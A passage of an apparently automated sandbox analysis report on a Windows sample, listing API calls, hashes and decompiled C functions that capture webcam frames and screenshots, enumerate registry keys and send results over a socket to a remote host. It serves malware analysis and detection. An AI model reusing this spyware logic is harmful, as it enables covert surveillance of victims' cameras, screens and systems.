                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00401D00
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,camdlldata), ref: 00401D15
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 00401D2D
                                            • Part of subcall function 004052EC: CreateFileMappingA.KERNEL32 ref: 0040530E
                                            • Part of subcall function 004052EC: MapViewOfFileEx.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,0040BBF3,00000000), ref: 0040531D
                                            • Part of subcall function 004052EC: CloseHandle.KERNEL32(00000000,?,0040BBF3,00000000), ref: 00405326
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initcamcap,00415268,004151F0,?,?,00000000,CloseCamera,00000000,OpenCamera), ref: 00401D9F
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,004151F0,?,?,00000000,CloseCamera,00000000,OpenCamera), ref: 00401DA9
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,getcamframe), ref: 00401DCA
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 00401E30
                                          • atoi.MSVCRT ref: 00401E37
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004151F0), ref: 00401F14
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F1D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$D@2@@0@V?$basic_string@$?length@?$basic_string@$??8std@@FileHstd@@V12@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@?find@?$basic_string@?substr@?$basic_string@CloseCreateD@1@@HandleMappingV01@V10@0@V10@@Viewatoi
                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$camdlldata$closecam$getcamframe$getcamsingleframe$initcamcap$nocamera$startcamcap
                                          • API String ID: 1871107935-2220771084
                                          • Opcode ID: 210e37a37f9e0c99d1be353a1af9e3b9112400b93629fd3c79e67747ea02e0e5
                                          • Instruction ID: 183ee02595da0eeb8311e1689f08cbbe36985a9d478a6cb767cb9b2a83c2c828
                                          • Opcode Fuzzy Hash: 210e37a37f9e0c99d1be353a1af9e3b9112400b93629fd3c79e67747ea02e0e5
                                          • Instruction Fuzzy Hash: 23519732901215ABCB14EBE1EC0AAEE7B68EF81314B14447BF805B71E1DBBC4584CB9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 30%
                                          			E0040DA55(void* __edx, char _a4) {
                                          				char _v5;
                                          				intOrPtr* _v12;
                                          				char _v28;
                                          				char _v44;
                                          				char _v56;
                                          				char _v72;
                                          				char _v88;
                                          				char _v104;
                                          				char _v120;
                                          				char _v136;
                                          				char* _v140;
                                          				intOrPtr _v144;
                                          				intOrPtr _v148;
                                          				void* _v164;
                                          				char _v168;
                                          				char _v184;
                                          				char _v200;
                                          				intOrPtr _v264;
                                          				char _v272;
                                          				void* _t57;
                                          				char _t62;
                                          				intOrPtr* _t74;
                                          				char* _t78;
                                          				char* _t81;
                                          				char* _t82;
                                          				char* _t83;
                                          				void* _t84;
                                          				void* _t85;
                                          				char* _t90;
                                          				char* _t91;
                                          				char* _t92;
                                          				char* _t93;
                                          				char* _t94;
                                          				intOrPtr* _t140;
                                          				void* _t144;
                                          				void* _t145;
                                          				intOrPtr _t159;
                                          				intOrPtr _t160;
                                          				intOrPtr _t161;
                                          
                                          				_t159 =  *0x415abc; // 0x0
                                          				if(_t159 == 0) {
                                          					E0040DD21( &_v72, 0, 0, 0);
                                          					_push(0);
                                          					_push( &_v72);
                                          					_push(0x415abc);
                                          					L0040FF68();
                                          				}
                                          				_t160 =  *0x415ab8; // 0x0
                                          				if(_t160 == 0) {
                                          					 *0x415ab8 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                          				}
                                          				_t57 = E0040D71E( &_v44);
                                          				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t57);
                                          				_v12 =  *0x415ab8(_t57);
                                          				E0040DD42( &_v136, _t58, 0);
                                          				E0040D999(L"image/jpeg",  &_v184);
                                          				_t62 = 1;
                                          				_v168 = _t62;
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				_v148 = _t62;
                                          				_v144 = 4;
                                          				_v140 =  &_a4;
                                          				_t140 =  *0x415ab8(0, 0);
                                          				E0040DE11( &_v184,  &_v136, _t140,  &_v184,  &_v168);
                                          				 *((intOrPtr*)( *_t140 + 0x30))(_t140,  &_v272, 1);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_v264, 0,  &_v5);
                                          				 *((intOrPtr*)( *_t140 + 0x14))(_t140, 0, 0, 0, 0);
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_v264, 0);
                                          				 *((intOrPtr*)( *_t140 + 0xc))(_t140, 0);
                                          				_t74 = _v12;
                                          				 *((intOrPtr*)( *_t74 + 8))(_t74);
                                          				 *((intOrPtr*)( *_t140 + 8))(_t140);
                                          				_t78 =  &_v56;
                                          				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t78, 0xa);
                                          				__imp___itoa(_t78);
                                          				_t145 = _t144 + 0xc;
                                          				_t161 =  *0x415ac0; // 0x0
                                          				if(_t161 != 0) {
                                          					_t81 =  &_v88;
                                          					L0040FC1A();
                                          					_t82 =  &_v104;
                                          					L0040FC20();
                                          					_t83 =  &_v120;
                                          					L0040FC14();
                                          					L0040FC14();
                                          					_t84 = E00402198(0x415ac0, _t145 - 0x10);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t83, _t83, _t82, _t82, _t81, _t81, "scrshot", 0x415268,  &_v56, 0x415268,  &_v28);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				} else {
                                          					E00402109(0x415ac0);
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					E00402168(0x415ac0);
                                          					E004021EB(0x415ac0, E0040DE63);
                                          					_t90 =  &_v120;
                                          					L0040FC1A();
                                          					_t91 =  &_v104;
                                          					L0040FC20();
                                          					_t92 =  &_v88;
                                          					L0040FC14();
                                          					_t93 =  &_v200;
                                          					L0040FC14();
                                          					_t94 =  &_v72;
                                          					L0040FC14();
                                          					L0040FC14();
                                          					_t84 = E00402198(0x415ac0, _t145);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t94, _t94, _t93, _t93, _t92, _t92, _t91, _t91, _t90, _t90, "initializescrcap", 0x415268,  &_v56, 0x415268,  &_v28, 0x415268, 0x415b18);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				}
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				_t85 = E0040DDA1(_t84,  &_v136);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t85;
                                          			}










































                                          0x0040da61
                                          0x0040da69
                                          0x0040da71
                                          0x0040da79
                                          0x0040da7a
                                          0x0040da7b
                                          0x0040da80
                                          0x0040da80
                                          0x0040da85
                                          0x0040da8b
                                          0x0040daa1
                                          0x0040daa1
                                          0x0040daaa
                                          0x0040dab3
                                          0x0040dabc
                                          0x0040dac6
                                          0x0040dadb
                                          0x0040dade
                                          0x0040daef
                                          0x0040db03
                                          0x0040db04
                                          0x0040db0b
                                          0x0040db0c
                                          0x0040db0d
                                          0x0040db0e
                                          0x0040db0f
                                          0x0040db19
                                          0x0040db23
                                          0x0040db2f
                                          0x0040db46
                                          0x0040db57
                                          0x0040db68
                                          0x0040db77
                                          0x0040db86
                                          0x0040db8e
                                          0x0040db91
                                          0x0040db97
                                          0x0040db9d
                                          0x0040dba0
                                          0x0040dba9
                                          0x0040dbb0
                                          0x0040dbb6
                                          0x0040dbb9
                                          0x0040dbbf
                                          0x0040dca5
                                          0x0040dcae
                                          0x0040dcb7
                                          0x0040dcbb
                                          0x0040dcc4
                                          0x0040dcc8
                                          0x0040dcd2
                                          0x0040dcdf
                                          0x0040dce7
                                          0x0040dcf0
                                          0x0040dbc5
                                          0x0040dbcc
                                          0x0040dbdd
                                          0x0040dbde
                                          0x0040dbdf
                                          0x0040dbe0
                                          0x0040dbe1
                                          0x0040dbed
                                          0x0040dc0c
                                          0x0040dc15
                                          0x0040dc1e
                                          0x0040dc22
                                          0x0040dc2b
                                          0x0040dc2f
                                          0x0040dc38
                                          0x0040dc3f
                                          0x0040dc48
                                          0x0040dc4c
                                          0x0040dc56
                                          0x0040dc60
                                          0x0040dc68
                                          0x0040dc74
                                          0x0040dc7d
                                          0x0040dc86
                                          0x0040dc8c
                                          0x0040dcf9
                                          0x0040dd02
                                          0x0040dd0e
                                          0x0040dd16
                                          0x0040dd20

                                          APIs
                                          • GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000,758EFF80,00415268,7313CB00), ref: 0040DA80
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,758EFF80,00415268,7313CB00), ref: 0040DA94
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040DA9B
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(758EFF80,00415268,7313CB00), ref: 0040DAB3
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DABC
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040DAC6
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040DB68
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040DB86
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040DBA9
                                          • _itoa.MSVCRT ref: 0040DBB0
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initializescrcap,00415268,?,00415268,?,00415268,00415B18), ref: 0040DC15
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00415268,00415B18), ref: 0040DC22
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00415B18), ref: 0040DC2F
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00415B18), ref: 0040DC3F
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00415B18), ref: 0040DC4C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC68
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC74
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC7D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC86
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040DC56
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,scrshot,00415268,?,00415268,?), ref: 0040DCAE
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00415268,?), ref: 0040DCBB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 0040DCC8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 0040DCD2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DCE7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DCF0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DCF9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DD02
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DD16
                                            • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                            • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                                            • Part of subcall function 004021EB: CreateThread.KERNEL32 ref: 00402200
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@D@2@@0@Hstd@@V?$basic_string@$V10@0@$?size@?$basic_string@$??0?$basic_string@?c_str@?$basic_string@V10@V10@@$AddressCreateD@1@@GdiplusLibraryLoadProcStartupThreadV01@@_itoaconnectsocket
                                          • String ID: Shlwapi.dll$image/jpeg$initializescrcap$scrshot
                                          • API String ID: 3965320395-4246769023
                                          • Opcode ID: 3485ed177e6c1eb5429dcb5cd6c2bae28b102ccd90b4a18a1b4464b3ba66bd49
                                          • Instruction ID: 37569ab505e31cf5d0ce7ce049b818f28185ad388a6b3e05f3e852d4fdd55162
                                          • Opcode Fuzzy Hash: 3485ed177e6c1eb5429dcb5cd6c2bae28b102ccd90b4a18a1b4464b3ba66bd49
                                          • Instruction Fuzzy Hash: 28816472900109AFDB14EBA0DD8ADEE777CFF54304F10417AF506A7191EA785E89CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 41%
                                          			E00409577(char _a4, char* _a20, intOrPtr _a24) {
                                          				void* _v8;
                                          				char _v24;
                                          				char _v40;
                                          				char _v56;
                                          				char _v72;
                                          				char _v88;
                                          				char _v104;
                                          				char _v120;
                                          				char _v136;
                                          				char _v152;
                                          				void* _t29;
                                          				long _t30;
                                          				char* _t31;
                                          				char* _t36;
                                          				char* _t37;
                                          				char* _t38;
                                          				char* _t39;
                                          				char* _t40;
                                          				char* _t41;
                                          				char* _t42;
                                          				char* _t43;
                                          				char* _t44;
                                          				char* _t54;
                                          				void* _t72;
                                          				void* _t74;
                                          
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          				_t29 = E004094DE( &_a4);
                                          				_t74 = _t72 - 0x10 + 0x10;
                                          				_t47 = 0;
                                          				_t30 = RegOpenKeyExA(_t29, _a20, 0, 0x20019,  &_v8);
                                          				_t89 = _t30;
                                          				if(_t30 != 0) {
                                          					_t31 =  &_v24;
                                          					L0040FC1A();
                                          					L0040FC20();
                                          					E00402198(0x4159a8, _t74 - 0x10);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t31, _t31, "regmsg", 0x415268, "3");
                                          				} else {
                                          					E0040926A( &_v8, _t89, _v8);
                                          					_t54 = "0";
                                          					if(_a24 != 0) {
                                          						_t54 = "1";
                                          					}
                                          					_t36 =  &_v24;
                                          					L0040FC1A();
                                          					_t37 =  &_v120;
                                          					L0040FC20();
                                          					_t38 =  &_v88;
                                          					L0040FC14();
                                          					_t39 =  &_v56;
                                          					L0040FC14();
                                          					_t40 =  &_v104;
                                          					L0040FC14();
                                          					_t41 =  &_v40;
                                          					L0040FC14();
                                          					_t42 =  &_v72;
                                          					L0040FC14();
                                          					_t43 =  &_v152;
                                          					L0040FC14();
                                          					_t44 =  &_v136;
                                          					L0040FC14();
                                          					L0040FC14();
                                          					E00402198(0x4159a8, _t74 - 0x10);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t37, _t37, _t36, _t36, "regopened", 0x415268, _t54, 0x415268, 0x415a00, 0x415268, 0x415998, 0x415268, 0x4159e8, 0x415268, 0x415a10);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x410668);
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x410668);
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x410668);
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x410668);
                                          					RegCloseKey(_v8);
                                          					_t47 = 1;
                                          				}
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t47;
                                          			}




























                                          0x0040958b
                                          0x00409591
                                          0x00409596
                                          0x0040959c
                                          0x004095a9
                                          0x004095af
                                          0x004095b1
                                          0x00409722
                                          0x00409737
                                          0x00409741
                                          0x0040974e
                                          0x00409756
                                          0x004095b7
                                          0x004095ba
                                          0x004095c3
                                          0x004095c8
                                          0x004095ca
                                          0x004095ca
                                          0x004095f3
                                          0x004095fc
                                          0x00409605
                                          0x00409609
                                          0x00409612
                                          0x00409616
                                          0x0040961f
                                          0x00409623
                                          0x0040962c
                                          0x00409630
                                          0x00409639
                                          0x0040963d
                                          0x00409646
                                          0x0040964a
                                          0x00409653
                                          0x0040965a
                                          0x00409663
                                          0x0040966a
                                          0x00409674
                                          0x00409681
                                          0x0040968c
                                          0x00409698
                                          0x004096a1
                                          0x004096aa
                                          0x004096b3
                                          0x004096bc
                                          0x004096c5
                                          0x004096ce
                                          0x004096d7
                                          0x004096e8
                                          0x004096f4
                                          0x00409700
                                          0x0040970c
                                          0x00409715
                                          0x0040971b
                                          0x0040971b
                                          0x0040975f
                                          0x0040976a

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00415268,00000000), ref: 0040958B
                                            • Part of subcall function 004094DE: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00415268,?,00409C86), ref: 004094F1
                                            • Part of subcall function 004094DE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409561
                                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00409BF5), ref: 004095A9
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,regopened,00415268,00410844,00415268,00415A00,00415268,00415998,00415268,004159E8,00415268,00415A10), ref: 004095FC
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004159E8,00415268,00415A10), ref: 00409609
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00415A10), ref: 00409616
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00415A10), ref: 00409623
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00415A10), ref: 00409630
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040963D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040964A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040965A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040966A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409674
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040968C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409698
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096A1
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096AA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096B3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096BC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096C5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096CE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096D7
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 004096E8
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 004096F4
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 00409700
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 0040970C
                                          • RegCloseKey.ADVAPI32(00409BF5), ref: 00409715
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,regmsg,00415268,00410848), ref: 00409737
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410848), ref: 00409741
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00410848), ref: 00409756
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00410848), ref: 0040975F
                                            • Part of subcall function 0040926A: RegQueryInfoKeyA.ADVAPI32(004095BF,?,00000000,00000000,004095BF,?,?), ref: 004092D6
                                            • Part of subcall function 0040926A: RegEnumKeyExA.ADVAPI32(004095BF,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00409305
                                            • Part of subcall function 0040926A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?), ref: 0040931B
                                            • Part of subcall function 0040926A: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000), ref: 0040932D
                                            • Part of subcall function 0040926A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,004095BF,00409BF5), ref: 0040933B
                                            • Part of subcall function 0040926A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 00409344
                                            • Part of subcall function 0040926A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 0040934D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
